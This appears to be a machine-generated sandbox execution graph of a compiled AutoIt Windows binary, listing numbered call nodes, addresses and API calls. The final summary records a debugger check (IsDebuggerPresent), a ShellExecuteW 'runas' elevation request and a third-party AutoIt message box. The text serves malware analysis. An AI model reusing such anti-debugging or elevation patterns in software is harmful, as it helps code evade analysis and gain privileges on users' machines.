101555->101552 101571 c78c4 61 API calls 101555->101571 101556->101552 101572 c78c4 61 API calls 101556->101572 101558 c785a 101557->101558 101559 c78b7 101557->101559 101558->101559 101561 c7865 101558->101561 101560 c7d2c 59 API calls 101559->101560 101566 c7888 _memmove 101560->101566 101562 feb09 101561->101562 101563 c7880 101561->101563 101565 c8029 59 API calls 101562->101565 101573 c7f27 59 API calls Mailbox 101563->101573 101567 feb13 101565->101567 101566->101506 101568 e0db6 Mailbox 59 API calls 101567->101568 101569 feb33 101568->101569 101570->101509 101571->101555 101572->101556 101573->101566 101574->101521 101575->101536 101577 c9169 Mailbox 101576->101577 101578 ff19f 101577->101578 101583 c9173 101577->101583 101579 e0db6 Mailbox 59 API calls 101578->101579 101581 ff1ab 101579->101581 101580 c917a 101580->101541 
101582 c9c90 Mailbox 59 API calls 101582->101583 101583->101580 101583->101582 101584->101404 101585->101404 101586->101398 101587->101389 101588->101391 101589->101389 101590->101410 101591->101422 101592->101422 101593->101432 101594 ffe27 101607 df944 101594->101607 101596 ffe3d 101597 ffebe 101596->101597 101598 ffe53 101596->101598 101616 cfce0 101597->101616 101696 c9e5d 60 API calls 101598->101696 101600 ffe92 101601 10089c 101600->101601 101604 ffe9a 101600->101604 101698 129e4a 89 API calls 4 library calls 101601->101698 101697 12834f 59 API calls Mailbox 101604->101697 101606 ffeb2 Mailbox 101606->101606 101608 df950 101607->101608 101609 df962 101607->101609 101610 c9d3c 60 API calls 101608->101610 101611 df968 101609->101611 101612 df991 101609->101612 101615 df95a 101610->101615 101613 e0db6 Mailbox 59 API calls 101611->101613 101614 c9d3c 60 API calls 101612->101614 101613->101615 101614->101615 101615->101596 101699 c8180 101616->101699 101618 cfd3d 101619 10472d 101618->101619 101679 d06f6 101618->101679 101704 cf234 101618->101704 101806 129e4a 89 API calls 4 library calls 101619->101806 101623 cfe3e 101627 cfe4c 101623->101627 101654 10488d 101623->101654 101810 1166ec 59 API calls 2 library calls 101623->101810 101624 104b53 101658 104742 101624->101658 101831 129e4a 89 API calls 4 library calls 101624->101831 101625 d0517 101633 e0db6 Mailbox 59 API calls 101625->101633 101626 1047d7 101626->101658 101808 129e4a 89 API calls 4 library calls 101626->101808 101627->101624 101637 1048f9 101627->101637 101708 c837c 101627->101708 101629 104755 101629->101626 101807 cf6a3 341 API calls 101629->101807 101631 e0db6 59 API calls Mailbox 101642 cfdd3 101631->101642 101640 d0545 _memmove 101633->101640 101634 1048b2 Mailbox 101634->101627 101813 1166ec 59 API calls 2 library calls 101634->101813 101635 104848 101811 1160ef 59 API calls 2 library calls 101635->101811 101644 104917 101637->101644 101814 c85c0 101637->101814 101649 e0db6 Mailbox 59 API calls 
101640->101649 101642->101623 101642->101625 101642->101629 101642->101631 101642->101640 101642->101658 101660 c9ea0 341 API calls 101642->101660 101671 10480c 101642->101671 101651 c85c0 59 API calls 101644->101651 101655 104928 101644->101655 101645 cfea4 101652 104ad6 101645->101652 101653 cff32 101645->101653 101688 d0179 Mailbox _memmove 101645->101688 101646 10486b 101648 c9ea0 341 API calls 101646->101648 101648->101654 101694 d0106 _memmove 101649->101694 101651->101655 101830 129ae7 60 API calls 101652->101830 101656 e0db6 Mailbox 59 API calls 101653->101656 101654->101627 101654->101658 101812 13a2d9 85 API calls Mailbox 101654->101812 101655->101688 101822 1160ab 59 API calls Mailbox 101655->101822 101661 cff39 101656->101661 101660->101642 101661->101679 101715 d09d0 101661->101715 101662 104a4d 101663 c9ea0 341 API calls 101662->101663 101665 104a87 101663->101665 101665->101658 101825 c84c0 101665->101825 101667 cffb2 101667->101640 101674 cffe6 101667->101674 101667->101679 101809 129e4a 89 API calls 4 library calls 101671->101809 101673 104ab2 101829 129e4a 89 API calls 4 library calls 101673->101829 101678 c8047 59 API calls 101674->101678 101682 d0007 101674->101682 101676 c9c90 Mailbox 59 API calls 101676->101694 101677 c9d3c 60 API calls 101677->101688 101678->101682 101805 129e4a 89 API calls 4 library calls 101679->101805 101680 e0db6 59 API calls Mailbox 101680->101688 101681 d0398 101681->101606 101682->101679 101683 104b24 101682->101683 101685 d004c 101682->101685 101684 c9d3c 60 API calls 101683->101684 101684->101624 101685->101624 101685->101679 101686 d00d8 101685->101686 101687 c9d3c 60 API calls 101686->101687 101690 d00eb 101687->101690 101688->101662 101688->101673 101688->101677 101688->101679 101688->101680 101688->101681 101689 104a1c 101688->101689 101803 c8740 68 API calls __cinit 101688->101803 101804 c8660 68 API calls 101688->101804 101823 125937 68 API calls 101688->101823 101824 c89b3 69 API calls Mailbox 101688->101824 
101691 e0db6 Mailbox 59 API calls 101689->101691 101690->101679 101792 c82df 101690->101792 101691->101662 101694->101676 101694->101688 101695 d0162 101694->101695 101695->101606 101696->101600 101697->101606 101698->101606 101700 c818f 101699->101700 101703 c81aa 101699->101703 101701 c7e4f 59 API calls 101700->101701 101702 c8197 CharUpperBuffW 101701->101702 101702->101703 101703->101618 101705 cf251 101704->101705 101706 cf272 101705->101706 101832 129e4a 89 API calls 4 library calls 101705->101832 101706->101642 101709 c838d 101708->101709 101710 fedbd 101708->101710 101711 e0db6 Mailbox 59 API calls 101709->101711 101712 c8394 101711->101712 101713 c83b5 101712->101713 101833 c8634 59 API calls Mailbox 101712->101833 101713->101637 101713->101645 101716 104cc3 101715->101716 101728 d09f5 101715->101728 101894 129e4a 89 API calls 4 library calls 101716->101894 101718 d0ce4 101719 d0cfa 101718->101719 101891 d1070 10 API calls Mailbox 101718->101891 101719->101667 101721 d0ee4 101721->101719 101723 d0ef1 101721->101723 101892 d1093 341 API calls Mailbox 101723->101892 101724 d0a4b PeekMessageW 101744 d0a05 Mailbox 101724->101744 101727 d0ef8 LockWindowUpdate DestroyWindow GetMessageW 101727->101719 101730 d0f2a 101727->101730 101728->101744 101895 c9e5d 60 API calls 101728->101895 101896 116349 341 API calls 101728->101896 101729 104e81 Sleep 101729->101744 101732 105c58 TranslateMessage DispatchMessageW GetMessageW 101730->101732 101732->101732 101733 105c88 101732->101733 101733->101719 101734 c9e5d 60 API calls 101734->101744 101735 d0ea5 TranslateMessage DispatchMessageW 101736 d0e43 PeekMessageW 101735->101736 101736->101744 101737 104d50 TranslateAcceleratorW 101737->101736 101737->101744 101738 10581f WaitForSingleObject 101738->101744 101745 10583c GetExitCodeProcess CloseHandle 101738->101745 101740 d0d13 timeGetTime 101740->101744 101741 d0e5f Sleep 101764 d0e70 Mailbox 101741->101764 101742 c8047 59 API calls 101742->101744 101743 c7667 59 API calls 
101743->101764 101744->101718 101744->101724 101744->101729 101744->101734 101744->101735 101744->101736 101744->101737 101744->101738 101744->101740 101744->101741 101744->101742 101746 d0f95 101744->101746 101747 105af8 Sleep 101744->101747 101749 e0db6 59 API calls Mailbox 101744->101749 101750 cb73c 314 API calls 101744->101750 101753 d0f4e timeGetTime 101744->101753 101757 c9837 84 API calls 101744->101757 101744->101764 101775 cfce0 314 API calls 101744->101775 101778 129e4a 89 API calls 101744->101778 101780 c84c0 69 API calls 101744->101780 101781 c9c90 59 API calls Mailbox 101744->101781 101782 c9ea0 314 API calls 101744->101782 101783 c82df 59 API calls 101744->101783 101784 c89b3 69 API calls 101744->101784 101785 11617e 59 API calls Mailbox 101744->101785 101786 1055d5 VariantClear 101744->101786 101787 10566b VariantClear 101744->101787 101788 c8cd4 59 API calls Mailbox 101744->101788 101789 105419 VariantClear 101744->101789 101790 116e8f 59 API calls 101744->101790 101791 c7de1 59 API calls 101744->101791 101834 ce6a0 101744->101834 101865 cf460 101744->101865 101885 c31ce 101744->101885 101890 ce420 341 API calls 101744->101890 101897 146018 59 API calls 101744->101897 101898 129a15 59 API calls Mailbox 101744->101898 101899 11d4f2 59 API calls 101744->101899 101900 1160ef 59 API calls 2 library calls 101744->101900 101901 c8401 59 API calls 101744->101901 101745->101746 101746->101667 101747->101764 101749->101744 101750->101744 101752 e049f timeGetTime 101752->101764 101893 c9e5d 60 API calls 101753->101893 101756 105b8f GetExitCodeProcess 101758 105ba5 WaitForSingleObject 101756->101758 101759 105bbb CloseHandle 101756->101759 101757->101744 101758->101744 101758->101759 101759->101764 101762 145f25 110 API calls 101762->101764 101763 cb7dd 109 API calls 101763->101764 101764->101743 101764->101744 101764->101746 101764->101752 101764->101756 101764->101762 101764->101763 101765 105874 101764->101765 101766 105078 Sleep 101764->101766 101767 
105c17 Sleep 101764->101767 101769 c7de1 59 API calls 101764->101769 101902 122408 60 API calls 101764->101902 101903 c9e5d 60 API calls 101764->101903 101904 c89b3 69 API calls Mailbox 101764->101904 101905 cb73c 341 API calls 101764->101905 101906 1164da 60 API calls 101764->101906 101907 125244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 101764->101907 101908 123c55 66 API calls Mailbox 101764->101908 101765->101746 101766->101744 101767->101744 101769->101764 101775->101744 101778->101744 101780->101744 101781->101744 101782->101744 101783->101744 101784->101744 101785->101744 101786->101744 101787->101744 101788->101744 101789->101744 101790->101744 101791->101744 101793 feda1 101792->101793 101796 c82f2 101792->101796 101794 fedb1 101793->101794 102798 1161a4 59 API calls 101793->102798 101797 c831c 101796->101797 101798 c85c0 59 API calls 101796->101798 101802 c8339 Mailbox 101796->101802 101799 c8322 101797->101799 101800 c85c0 59 API calls 101797->101800 101798->101797 101801 c9c90 Mailbox 59 API calls 101799->101801 101799->101802 101800->101799 101801->101802 101802->101694 101803->101688 101804->101688 101805->101619 101806->101658 101807->101626 101808->101658 101809->101658 101810->101635 101811->101646 101812->101634 101813->101634 101815 c85ce 101814->101815 101820 c85f6 101814->101820 101816 c85dc 101815->101816 101817 c85c0 59 API calls 101815->101817 101818 c85e2 101816->101818 101819 c85c0 59 API calls 101816->101819 101817->101816 101818->101820 101821 c9c90 Mailbox 59 API calls 101818->101821 101819->101818 101820->101644 101821->101820 101822->101688 101823->101688 101824->101688 101826 c84cb 101825->101826 101828 c84f2 101826->101828 102799 c89b3 69 API calls Mailbox 101826->102799 101828->101673 101829->101658 101830->101674 101831->101658 101832->101706 101833->101713 101835 ce6d5 101834->101835 101836 103aa9 101835->101836 101839 ce73f 101835->101839 101848 ce799 101835->101848 101837 c9ea0 341 
API calls 101836->101837 101838 103abe 101837->101838 101853 ce970 Mailbox 101838->101853 101910 129e4a 89 API calls 4 library calls 101838->101910 101842 c7667 59 API calls 101839->101842 101839->101848 101840 c7667 59 API calls 101840->101848 101844 103b04 101842->101844 101843 e2d40 __cinit 67 API calls 101843->101848 101845 e2d40 __cinit 67 API calls 101844->101845 101845->101848 101846 103b26 101846->101744 101847 c84c0 69 API calls 101847->101853 101848->101840 101848->101843 101848->101846 101850 ce95a 101848->101850 101848->101853 101849 c9ea0 341 API calls 101849->101853 101850->101853 101911 129e4a 89 API calls 4 library calls 101850->101911 101851 129e4a 89 API calls 101851->101853 101853->101847 101853->101849 101853->101851 101854 c8d40 59 API calls 101853->101854 101856 c9c90 Mailbox 59 API calls 101853->101856 101861 cf195 101853->101861 101864 cea78 101853->101864 101909 c7f77 59 API calls 2 library calls 101853->101909 101912 116e8f 59 API calls 101853->101912 101913 13c5c3 341 API calls 101853->101913 101914 13b53c 341 API calls Mailbox 101853->101914 101916 1393c6 341 API calls Mailbox 101853->101916 101854->101853 101856->101853 101915 129e4a 89 API calls 4 library calls 101861->101915 101863 103e25 101863->101744 101864->101744 101866 cf4ba 101865->101866 101867 cf650 101865->101867 101868 cf4c6 101866->101868 101869 10441e 101866->101869 101870 c7de1 59 API calls 101867->101870 102018 cf290 341 API calls 2 library calls 101868->102018 102019 13bc6b 341 API calls Mailbox 101869->102019 101876 cf58c Mailbox 101870->101876 101873 10442c 101877 cf630 101873->101877 102020 129e4a 89 API calls 4 library calls 101873->102020 101875 cf4fd 101875->101873 101875->101876 101875->101877 101917 123c37 101876->101917 101920 13df37 101876->101920 101923 13445a 101876->101923 101932 12cb7a 101876->101932 102012 c4e4a 101876->102012 101877->101744 101878 c9c90 Mailbox 59 API calls 101879 cf5e3 101878->101879 101879->101877 101879->101878 101886 c3212 
101885->101886 101887 c31e0 101885->101887 101886->101744 101887->101886 101888 c3205 IsDialogMessageW 101887->101888 101889 fcf32 GetClassLongW 101887->101889 101888->101886 101888->101887 101889->101887 101889->101888 101890->101744 101891->101721 101892->101727 101893->101744 101894->101728 101895->101728 101896->101728 101897->101744 101898->101744 101899->101744 101900->101744 101901->101744 101902->101764 101903->101764 101904->101764 101905->101764 101906->101764 101907->101764 101908->101764 101909->101853 101910->101853 101911->101853 101912->101853 101913->101853 101914->101853 101915->101863 101916->101853 102021 12445a GetFileAttributesW 101917->102021 101921 13cadd 130 API calls 101920->101921 101922 13df47 101921->101922 101922->101879 101924 c9837 84 API calls 101923->101924 101925 134494 101924->101925 102025 c6240 101925->102025 101927 1344a4 101928 1344c9 101927->101928 101929 c9ea0 341 API calls 101927->101929 101931 1344cd 101928->101931 102050 c9a98 59 API calls Mailbox 101928->102050 101929->101928 101931->101879 101933 c7667 59 API calls 101932->101933 101934 12cbaf 101933->101934 101935 c7667 59 API calls 101934->101935 101936 12cbb8 101935->101936 101937 12cbcc 101936->101937 102266 c9b3c 59 API calls 101936->102266 101939 c9837 84 API calls 101937->101939 101940 12cbe9 101939->101940 101941 12ccea 101940->101941 101942 12cc0b 101940->101942 102011 12cd1a Mailbox 101940->102011 102070 c4ddd 101941->102070 101943 c9837 84 API calls 101942->101943 101945 12cc17 101943->101945 101947 c8047 59 API calls 101945->101947 101949 12cc23 101947->101949 101948 12cd16 101951 c7667 59 API calls 101948->101951 101948->102011 101955 12cc37 101949->101955 101956 12cc69 101949->101956 101950 c4ddd 136 API calls 101950->101948 101952 12cd4b 101951->101952 101953 c7667 59 API calls 101952->101953 101954 12cd54 101953->101954 101957 c7667 59 API calls 101954->101957 101958 c8047 59 API calls 101955->101958 101959 c9837 84 API calls 101956->101959 101961 12cd5d 
101957->101961 101962 12cc47 101958->101962 101960 12cc76 101959->101960 101963 c8047 59 API calls 101960->101963 101964 c7667 59 API calls 101961->101964 101965 c7cab 59 API calls 101962->101965 101966 12cc82 101963->101966 101967 12cd66 101964->101967 101968 12cc51 101965->101968 102267 124a31 GetFileAttributesW 101966->102267 101970 c9837 84 API calls 101967->101970 101971 c9837 84 API calls 101968->101971 101973 12cd73 101970->101973 101974 12cc5d 101971->101974 101972 12cc8b 101975 12cc9e 101972->101975 101978 c79f2 59 API calls 101972->101978 102094 c459b 101973->102094 101977 c7b2e 59 API calls 101974->101977 101980 c9837 84 API calls 101975->101980 101986 12cca4 101975->101986 101977->101956 101978->101975 101979 12cd8e 102145 c79f2 101979->102145 101982 12cccb 101980->101982 102268 1237ef 75 API calls Mailbox 101982->102268 101985 12cdd1 101987 c8047 59 API calls 101985->101987 101986->102011 101989 12cddf 101987->101989 101988 c79f2 59 API calls 101990 12cdae 101988->101990 102148 c7b2e 101989->102148 101990->101985 101993 c7bcc 59 API calls 101990->101993 101994 12cdc3 101993->101994 101996 c7bcc 59 API calls 101994->101996 101995 c7b2e 59 API calls 101997 12cdfb 101995->101997 101996->101985 101998 c7b2e 59 API calls 101997->101998 101999 12ce09 101998->101999 102000 c9837 84 API calls 101999->102000 102001 12ce15 102000->102001 102157 124071 102001->102157 102003 12ce26 102004 123c37 3 API calls 102003->102004 102005 12ce30 102004->102005 102006 c9837 84 API calls 102005->102006 102010 12ce61 102005->102010 102007 12ce4e 102006->102007 102211 129155 102007->102211 102009 c4e4a 84 API calls 102009->102011 102010->102009 102011->101879 102013 c4e54 102012->102013 102015 c4e5b 102012->102015 102014 e53a6 __fcloseall 83 API calls 102013->102014 102014->102015 102016 c4e6a 102015->102016 102017 c4e7b FreeLibrary 102015->102017 102016->101879 102017->102016 102018->101875 102019->101873 102020->101877 102022 123c3e 102021->102022 102023 124475 FindFirstFileW 
102021->102023 102022->101879 102023->102022 102024 12448a FindClose 102023->102024 102024->102022 102051 c7a16 102025->102051 102027 c646a 102058 c750f 102027->102058 102029 c6484 Mailbox 102029->101927 102032 c6265 102032->102027 102033 c7d8c 59 API calls 102032->102033 102034 c6799 _memmove 102032->102034 102035 fdff6 102032->102035 102036 c750f 59 API calls 102032->102036 102043 fdf92 102032->102043 102047 c7e4f 59 API calls 102032->102047 102056 c5f6c 60 API calls 102032->102056 102057 c5d41 59 API calls Mailbox 102032->102057 102066 c5e72 60 API calls 102032->102066 102067 c7924 59 API calls 2 library calls 102032->102067 102033->102032 102069 11f8aa 91 API calls 4 library calls 102034->102069 102068 11f8aa 91 API calls 4 library calls 102035->102068 102036->102032 102039 fe004 102041 c750f 59 API calls 102039->102041 102042 fe01a 102041->102042 102042->102029 102044 c8029 59 API calls 102043->102044 102045 fdf9d 102044->102045 102049 e0db6 Mailbox 59 API calls 102045->102049 102048 c643b CharUpperBuffW 102047->102048 102048->102032 102049->102034 102050->101931 102052 e0db6 Mailbox 59 API calls 102051->102052 102053 c7a3b 102052->102053 102054 c8029 59 API calls 102053->102054 102055 c7a4a 102054->102055 102055->102032 102056->102032 102057->102032 102059 c75af 102058->102059 102060 c7522 _memmove 102058->102060 102062 e0db6 Mailbox 59 API calls 102059->102062 102061 e0db6 Mailbox 59 API calls 102060->102061 102064 c7529 102061->102064 102062->102060 102063 c7552 102063->102029 102064->102063 102065 e0db6 Mailbox 59 API calls 102064->102065 102065->102063 102066->102032 102067->102032 102068->102039 102069->102029 102269 c4bb5 102070->102269 102075 c4e08 LoadLibraryExW 102279 c4b6a 102075->102279 102076 fd8e6 102077 c4e4a 84 API calls 102076->102077 102079 fd8ed 102077->102079 102081 c4b6a 3 API calls 102079->102081 102083 fd8f5 102081->102083 102305 c4f0b 102083->102305 102084 c4e2f 102084->102083 102085 c4e3b 102084->102085 102086 c4e4a 84 API calls 
102085->102086 102088 c4e40 102086->102088 102088->101948 102088->101950 102091 fd91c 102313 c4ec7 102091->102313 102095 c7667 59 API calls 102094->102095 102096 c45b1 102095->102096 102097 c7667 59 API calls 102096->102097 102098 c45b9 102097->102098 102099 c7667 59 API calls 102098->102099 102100 c45c1 102099->102100 102101 c7667 59 API calls 102100->102101 102102 c45c9 102101->102102 102103 c45fd 102102->102103 102104 fd4d2 102102->102104 102105 c784b 59 API calls 102103->102105 102106 c8047 59 API calls 102104->102106 102107 c460b 102105->102107 102108 fd4db 102106->102108 102109 c7d2c 59 API calls 102107->102109 102110 c7d8c 59 API calls 102108->102110 102111 c4615 102109->102111 102113 c4640 102110->102113 102112 c784b 59 API calls 102111->102112 102111->102113 102116 c4636 102112->102116 102114 c4680 102113->102114 102117 c465f 102113->102117 102127 fd4fb 102113->102127 102115 c784b 59 API calls 102114->102115 102118 c4691 102115->102118 102119 c7d2c 59 API calls 102116->102119 102121 c79f2 59 API calls 102117->102121 102122 c46a3 102118->102122 102125 c8047 59 API calls 102118->102125 102119->102113 102120 fd5cb 102123 c7bcc 59 API calls 102120->102123 102124 c4669 102121->102124 102126 c46b3 102122->102126 102128 c8047 59 API calls 102122->102128 102144 fd588 102123->102144 102124->102114 102131 c784b 59 API calls 102124->102131 102125->102122 102130 c46ba 102126->102130 102132 c8047 59 API calls 102126->102132 102127->102120 102129 fd5b4 102127->102129 102141 fd532 102127->102141 102128->102126 102129->102120 102134 fd59f 102129->102134 102133 c8047 59 API calls 102130->102133 102140 c46c1 Mailbox 102130->102140 102131->102114 102132->102130 102133->102140 102136 c7bcc 59 API calls 102134->102136 102135 fd590 102137 c7bcc 59 API calls 102135->102137 102136->102144 102137->102144 102138 c79f2 59 API calls 102138->102144 102140->101979 102141->102135 102142 fd57b 102141->102142 102143 c7bcc 59 API calls 102142->102143 102143->102144 102144->102114 
102144->102138 102485 c7924 59 API calls 2 library calls 102144->102485 102146 c7e4f 59 API calls 102145->102146 102147 c79fd 102146->102147 102147->101985 102147->101988 102149 fec6b 102148->102149 102150 c7b40 102148->102150 102492 117bdb 59 API calls _memmove 102149->102492 102486 c7a51 102150->102486 102153 c7b4c 102153->101995 102154 fec75 102155 c8047 59 API calls 102154->102155 102156 fec7d Mailbox 102155->102156 102158 12408d 102157->102158 102159 124092 102158->102159 102160 1240a0 102158->102160 102161 c8047 59 API calls 102159->102161 102162 c7667 59 API calls 102160->102162 102163 12409b Mailbox 102161->102163 102164 1240a8 102162->102164 102163->102003 102165 c7667 59 API calls 102164->102165 102166 1240b0 102165->102166 102167 c7667 59 API calls 102166->102167 102168 1240bb 102167->102168 102169 c7667 59 API calls 102168->102169 102170 1240c3 102169->102170 102171 c7667 59 API calls 102170->102171 102172 1240cb 102171->102172 102173 c7667 59 API calls 102172->102173 102174 1240d3 102173->102174 102175 c7667 59 API calls 102174->102175 102176 1240db 102175->102176 102177 c7667 59 API calls 102176->102177 102178 1240e3 102177->102178 102179 c459b 59 API calls 102178->102179 102180 1240fa 102179->102180 102181 c459b 59 API calls 102180->102181 102182 124113 102181->102182 102183 c79f2 59 API calls 102182->102183 102184 12411f 102183->102184 102185 124132 102184->102185 102186 c7d2c 59 API calls 102184->102186 102187 c79f2 59 API calls 102185->102187 102186->102185 102188 12413b 102187->102188 102189 12414b 102188->102189 102190 c7d2c 59 API calls 102188->102190 102191 c8047 59 API calls 102189->102191 102190->102189 102192 124157 102191->102192 102193 c7b2e 59 API calls 102192->102193 102194 124163 102193->102194 102493 124223 59 API calls 102194->102493 102196 124172 102494 124223 59 API calls 102196->102494 102198 124185 102199 c79f2 59 API calls 102198->102199 102200 12418f 102199->102200 102201 1241a6 102200->102201 102202 124194 102200->102202 
(Execution graph, continued: node ids 102204 through 103665. In the original report this is an interactive call graph whose flat export lists, per node, a numeric id, the code address, the Windows API calls made there or a summary such as "59 API calls" for a called subroutine, followed by edges written id->id. The raw node/edge list is summarized here rather than reproduced.)

Node labels: Windows API names; MSVC CRT internals (__getptd_noexit, __wsplitpath_helper, _raise, __lock, __write_nolock, __flswbuf, __calloc_crt, __wsopen_nolock and similar); "N API calls" for a subroutine; and "Mailbox", which is a Joe Sandbox annotation, not an API.

Windows APIs appearing in this portion of the graph, grouped by purpose:
Startup and environment: GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetModuleFileNameW, GetStartupInfoW, GetProcessHeap, HeapAlloc, GetStdHandle, GetFileType, GetVersionExW, GetCurrentProcess, IsWow64Process, GetSystemInfo, GetNativeSystemInfo, IsProcessorFeaturePresent, GetSystemTimeAsFileTime, GetCurrentThreadId, TlsAlloc, TlsSetValue, EncodePointer, DecodePointer, InitializeCriticalSectionAndSpinCount, EnterCriticalSection, LeaveCriticalSection, Sleep.
Dynamic import resolution: LoadLibraryA, GetProcAddress, FreeLibrary.
Resource access: FindResourceExW, LoadResource, SizeofResource, LockResource, CreateStreamOnHGlobal, EnumResourceNamesW, LoadImageW.
File and path handling: GetCurrentDirectoryW, SetCurrentDirectoryW, GetFullPathNameW, GetLongPathNameW, GetTempPathW, GetTempFileNameW, CreateFileW, ReadFile, SetFilePointerEx, CopyFileW, DeleteFileW, SetFileTime, CloseHandle, GetOpenFileNameW.
Registry: RegOpenKeyExW, RegQueryValueExW, RegCloseKey.
Token membership: AllocateAndInitializeSid, CheckTokenMembership, FreeSid.
Debugging and fault handling: IsDebuggerPresent, MessageBoxA, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess.
GUI, COM and threading: IsThemeActive, SystemParametersInfoW, GetSysColorBrush, LoadCursorW, LoadIconW, RegisterClassExW, CreateWindowExW, ShowWindow, RegisterWindowMessageW, GetStringTypeW, OleInitialize, CreateThread.

Call chains worth following in a disassembler:
Debugger check: IsDebuggerPresent at c3b7a, reached shortly after GetCurrentDirectoryW at c3b51; its two successors are c3b88 and MessageBoxA at fd272. This is the check behind the "Contains functionality to check if a debugger is running (IsDebuggerPresent)" signature. The second IsDebuggerPresent at e8c93 is inside the CRT fault-reporting path (nodes labelled __call_reportfault, leading to SetUnhandledExceptionFilter/UnhandledExceptionFilter at ea155 and GetCurrentProcess/TerminateProcess at ea140) and is not an anti-analysis check.
Temporary-file staging: GetTempPathW and GetTempFileNameW at 1298e3, a 115-API-call subroutine at e525b, CopyFileW at 129505 followed by DeleteFileW at 12951b or 12952d, then CreateFileW at 1298a2 with SetFileTime and CloseHandle at 1298c8; further DeleteFileW calls at 12944b and 1294f4.
Resource extraction: CreateStreamOnHGlobal at c4e89, then FindResourceExW at c4ea3, LoadResource at fd933, SizeofResource at fd948 and LockResource at fd95c.
Registry read: from c3582 through RegOpenKeyExW at c35c4, RegQueryValueExW at c35de and RegCloseKey at c3614.
OS and architecture probing: GetVersionExW at c49b8; GetCurrentProcess and IsWow64Process at c4a93; LoadLibraryA at c4b40 and GetProcAddress at c4b51 ahead of GetNativeSystemInfo at c4adc, with GetSystemInfo at c4b1f and c4b2b on the other paths.
Privilege check: AllocateAndInitializeSid, CheckTokenMembership and FreeSid at 11874b, called from c3c14.

Caveat: this portion of the graph covers process startup, environment and debugger checks, resource and temporary-file handling, a registry read and GUI initialisation, which is consistent with the overview's assessment that the binary is a compiled AutoIt script. None of the injection or credential-theft behaviours listed among the signatures (thread-context modification, APC queuing, writes to foreign memory, browser or mail credential access) appear here; those are not visible in this part of the graph.
65 API calls 103653->103665 103655 c7667 59 API calls 103654->103655 103656 dffe7 103655->103656 103657 c7667 59 API calls 103656->103657 103658 dffef 103657->103658 103659 c7667 59 API calls 103658->103659 103660 dff3b 103659->103660 103660->103610 103662 c7667 59 API calls 103661->103662 103663 d5aa5 103662->103663 103663->103624 103664->103650 103666 14cedc0 103680 14cca10 103666->103680 103668 14cee81 103683 14cecb0 103668->103683 103686 14cfeb0 GetPEB 103680->103686 103682 14cd09b 103682->103668 103684 14cecb9 Sleep 103683->103684 103685 14cecc7 103684->103685 103687 14cfeda 103686->103687 103687->103682 103688 c3633 103689 c366a 103688->103689 103690 c3688 103689->103690 103691 c36e7 103689->103691 103728 c36e5 103689->103728 103692 c374b PostQuitMessage 103690->103692 103693 c3695 103690->103693 103695 c36ed 103691->103695 103696 fd0cc 103691->103696 103700 c36d8 103692->103700 103698 fd154 103693->103698 103699 c36a0 103693->103699 103694 c36ca DefWindowProcW 103694->103700 103701 c3715 SetTimer RegisterWindowMessageW 103695->103701 103702 c36f2 103695->103702 103743 d1070 10 API calls Mailbox 103696->103743 103748 122527 71 API calls _memset 103698->103748 103704 c36a8 103699->103704 103705 c3755 103699->103705 103701->103700 103706 c373e CreatePopupMenu 103701->103706 103708 fd06f 103702->103708 103709 c36f9 KillTimer 103702->103709 103703 fd0f3 103744 d1093 341 API calls Mailbox 103703->103744 103712 fd139 103704->103712 103713 c36b3 103704->103713 103733 c44a0 103705->103733 103706->103700 103716 fd0a8 MoveWindow 103708->103716 103717 fd074 103708->103717 103740 c443a Shell_NotifyIconW _memset 103709->103740 103712->103694 103747 117c36 59 API calls Mailbox 103712->103747 103719 c36be 103713->103719 103720 fd124 103713->103720 103714 fd166 103714->103694 103714->103700 103716->103700 103721 fd078 103717->103721 103722 fd097 SetFocus 103717->103722 103718 c370c 103741 c3114 DeleteObject DestroyWindow Mailbox 103718->103741 103719->103694 103745 c443a 
Shell_NotifyIconW _memset 103719->103745 103746 122d36 81 API calls _memset 103720->103746 103721->103719 103725 fd081 103721->103725 103722->103700 103742 d1070 10 API calls Mailbox 103725->103742 103727 fd134 103727->103700 103728->103694 103731 fd118 103732 c434a 68 API calls 103731->103732 103732->103728 103734 c4539 103733->103734 103735 c44b7 _memset 103733->103735 103734->103700 103736 c407c 61 API calls 103735->103736 103738 c44de 103736->103738 103737 c4522 KillTimer SetTimer 103737->103734 103738->103737 103739 fd4ab Shell_NotifyIconW 103738->103739 103739->103737 103740->103718 103741->103700 103742->103700 103743->103703 103744->103719 103745->103731 103746->103727 103747->103728 103748->103714 103749 128d0d 103750 128d20 103749->103750 103751 128d1a 103749->103751 103753 128d31 103750->103753 103755 e2d55 _free 58 API calls 103750->103755 103752 e2d55 _free 58 API calls 103751->103752 103752->103750 103754 128d43 103753->103754 103756 e2d55 _free 58 API calls 103753->103756 103755->103753 103756->103754 103757 10416f 103761 115fe6 103757->103761 103759 10417a 103760 115fe6 85 API calls 103759->103760 103760->103759 103762 116020 103761->103762 103766 115ff3 103761->103766 103762->103759 103763 116022 103773 c9328 84 API calls Mailbox 103763->103773 103764 116027 103767 c9837 84 API calls 103764->103767 103766->103762 103766->103763 103766->103764 103770 11601a 103766->103770 103768 11602e 103767->103768 103769 c7b2e 59 API calls 103768->103769 103769->103762 103772 c95a0 59 API calls _wcsstr 103770->103772 103772->103762 103773->103764

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000C3B68
                                                        • IsDebuggerPresent.KERNEL32 ref: 000C3B7A
                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,001852F8,001852E0,?,?), ref: 000C3BEB
                                                          • Part of subcall function 000C7BCC: _memmove.LIBCMT ref: 000C7C06
                                                          • Part of subcall function 000D092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,000C3C14,001852F8,?,?,?), ref: 000D096E
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000C3C6F
                                                        • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00177770,00000010), ref: 000FD281
                                                        • SetCurrentDirectoryW.KERNEL32(?,001852F8,?,?,?), ref: 000FD2B9
                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00174260,001852F8,?,?,?), ref: 000FD33F
                                                        • ShellExecuteW.SHELL32(00000000,?,?), ref: 000FD346
                                                          • Part of subcall function 000C3A46: GetSysColorBrush.USER32(0000000F), ref: 000C3A50
                                                          • Part of subcall function 000C3A46: LoadCursorW.USER32(00000000,00007F00), ref: 000C3A5F
